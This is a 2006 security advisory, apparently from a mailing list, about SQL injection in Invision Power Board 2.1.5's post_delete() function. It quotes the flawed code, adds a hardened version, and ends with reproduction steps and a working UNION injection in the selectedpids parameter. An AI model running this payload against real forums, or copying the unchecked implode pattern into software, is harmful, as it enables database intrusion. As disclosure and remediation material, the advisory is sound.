Invision Power Board v2.1.5 Remote SQL Injection
Date: 28 Apr 2006 08:21:50 -0000
From: [email protected]
To: [email protected]
Subject: Invision Power Board v2.1.5 Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Filename		:- func_mod.php
Functionname	:- post_delete()
Lines			:- 89 To 209

Bug Found By :- Devil-00

        Greetz :-
                    Rock Master ^ Hackers Pal ^ n0m4rcy ^
                            www.securtygurus.net



        // Excerpt from post_delete() in func_mod.php as quoted in the advisory.
        // Array branch: elements are joined into the IN() list without any check.
        if ( is_array( $id ) )
        {
                if ( count($id) > 0 )
                {
                        $pid = " IN(".implode(",",$id).")";
                }
                else
                {
                        return FALSE;
                }
        }
        // Scalar branch: intval() is the only validation, and it is only applied here.
        else
        {
                if ( intval($id) )
                {
                        $pid   = "=$id";
                }
                else
                {
                        return FALSE;
                }
        }



When $id is an array, the code never applies the intval() check: the elements are concatenated into the WHERE clause as they arrive.


        if ( count($id) > 0 )
        {
                $pid = " IN(".implode(",",$id).")";
        }
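To make the missing check concrete, here is an added example (not IPB's own code) that places the array branch described above beside a hardened version; the function names and the sample inputs are constructed for this illustration.

```php
<?php
// Added example, not from func_mod.php: the post_delete() id check shape
// from the advisory, beside a hardened version. Helper names are assumed.

// Vulnerable shape: a scalar id goes through intval(), but array elements
// are joined verbatim, so any string reaches the WHERE clause unchanged.
function build_pid_clause_vulnerable($id)
{
    if (is_array($id)) {
        if (count($id) > 0) {
            return " IN(" . implode(",", $id) . ")";
        }
        return false;
    }
    if (intval($id)) {
        return "=$id";
    }
    return false;
}

// Hardened shape: every id, scalar or array element, must be a non-empty
// string of digits forming a positive integer; otherwise reject the request.
function build_pid_clause_hardened($id)
{
    $ids = is_array($id) ? $id : array($id);
    if (count($ids) === 0) {
        return false;
    }
    $clean = array();
    foreach ($ids as $value) {
        // ctype_digit() only accepts "0"-"9" characters, so a string such as
        // "-1) UNION SELECT 1,3/*" fails; the (string) cast covers int input.
        if (!is_scalar($value) || !ctype_digit((string) $value) || (int) $value < 1) {
            return false;
        }
        $clean[] = (int) $value;
    }
    return count($clean) === 1 ? "=" . $clean[0] : " IN(" . implode(",", $clean) . ")";
}

// Constructed inputs: two ordinary post ids, and the advisory's payload
// string arriving as an array element (the branch without intval()).
$normal  = array("17", "18");
$payload = array("-1) UNION SELECT 1,3/*");

var_dump(build_pid_clause_vulnerable($normal));
var_dump(build_pid_clause_vulnerable($payload));
var_dump(build_pid_clause_hardened($normal));
var_dump(build_pid_clause_hardened($payload));
```

The vulnerable builder emits the payload inside the IN() list, while the hardened builder returns false for it and produces the same clause as before for the ordinary ids.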

The unchecked $pid then reaches the following query:


$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );

and also this one:


$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );

Because the two queries select a different number of columns from different tables, the author notes that a single UNION payload cannot be used to exploit both.

Example, as given by the author:

        1- First add two posts.
        2- Select them for deletion.
        3- Edit the query string with HTTPLiveHeader:


act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete

